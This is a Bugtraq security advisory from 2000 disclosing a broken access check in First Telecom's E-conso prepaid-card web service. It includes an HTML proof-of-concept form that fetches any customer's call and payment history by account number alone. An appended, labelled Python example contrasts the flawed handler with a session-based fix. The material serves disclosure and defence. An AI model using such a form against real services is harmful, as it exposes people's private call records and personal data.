Bugtraq mailing list archives
First Telecom E-conso service totally insecure
From: thomas () CUIVRE FR EU ORG (Thomas Quinot)
Date: Tue, 4 Jan 2000 00:10:30 +0100
First Telecom, a company that provides a pre-paid calling card service in France, Germany and the United Kingdom, offers a service called E-conso which allows subscribers to check the current balance of their account and peruse the history of all calls they made through First Telecom.

The WWW form at the home page of the service requires entry of the account number (which is printed on all First Telecom documents and embossed on the plastic membership card sent to every subscriber), as well as a password chosen by the customer during the sign-up procedure.

The submission of this form returns a page which includes the customer's name and address, and a form (with a /fixed/ "action" URL) which contains the customer's account number as a "hidden" field. Submission of this form returns the details of payments or the call history, depending on which button is clicked by the customer.

No hidden field and no cookie is used to pass any client credentials back to the server, which means it is trivial to retrieve the details of past payments as well as the call history of a First Telecom customer knowing only her (non-secret) account number.

The HTML code included demonstrates this important flaw.

Thomas.

---------- cut here : first.html

    <html>
    <head>
    <title>First Telecom e-conso exploit</title>
    </head>
    <body>
    <form action="http://195.68.107.69/residential/wc.dll?firstphone~resformbutton" method="POST">
    <p>
    Account number: <input type="text" name="cmaster" value="0000000">
    <input type="submit" name="cmdcdr" value="Details of calls">
    <input type="submit" name="cmdpaymenthistory" value="Details of payements">
    </p>
    </form>
    </body>
    </html>
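The flaw described above is a missing server-side authorization check: the second form's account number is the only thing that selects whose data is returned. The following is an added example (not First Telecom's code, nor part of the original post) that models that vulnerable handler beside a hardened one which derives the account from an authenticated session and refuses a form naming any other account; the session store, passwords and call records are all constructed for the example.

```python
"""Added example: vulnerable vs. hardened handling of a call-history request.

Nothing here is First Telecom's code; the account numbers, passwords and
call records below are constructed sample data.
"""
import secrets
from typing import Dict, List, Optional, Tuple

# Constructed sample data: account number -> call history lines.
CALL_HISTORY: Dict[str, List[str]] = {
    "1234567": ["2000-01-02 Paris -> Lyon 3 min", "2000-01-03 Paris -> Berlin 12 min"],
    "7654321": ["2000-01-01 London -> Dublin 5 min"],
}

# Session store: opaque token (sent back as a cookie) -> authenticated account.
SESSIONS: Dict[str, str] = {}


def login(account: str, password: str, passwords: Dict[str, str]) -> Optional[str]:
    """Issue an unguessable session token only after the password check passes."""
    if passwords.get(account) != password:
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = account
    return token


def history_vulnerable(form: Dict[str, str]) -> Tuple[int, List[str]]:
    """The pattern the post describes: the 'cmaster' field alone selects the
    customer, and no credential is checked at all."""
    account = form.get("cmaster", "")
    if account not in CALL_HISTORY:
        return 404, []
    return 200, CALL_HISTORY[account]


def history_hardened(cookie: Optional[str], form: Dict[str, str]) -> Tuple[int, List[str]]:
    """Hardened handler: the account comes from the session, never from the form."""
    account = SESSIONS.get(cookie or "")
    if account is None:
        return 401, []          # no valid session: authenticate first
    # A form that names a different account than the session owner is rejected.
    if form.get("cmaster", account) != account:
        return 403, []
    return 200, CALL_HISTORY.get(account, [])
```

In the hardened version the hidden field becomes redundant; keeping the cross-check turns a tampered request into a 403 that can be logged and alerted on rather than silently served.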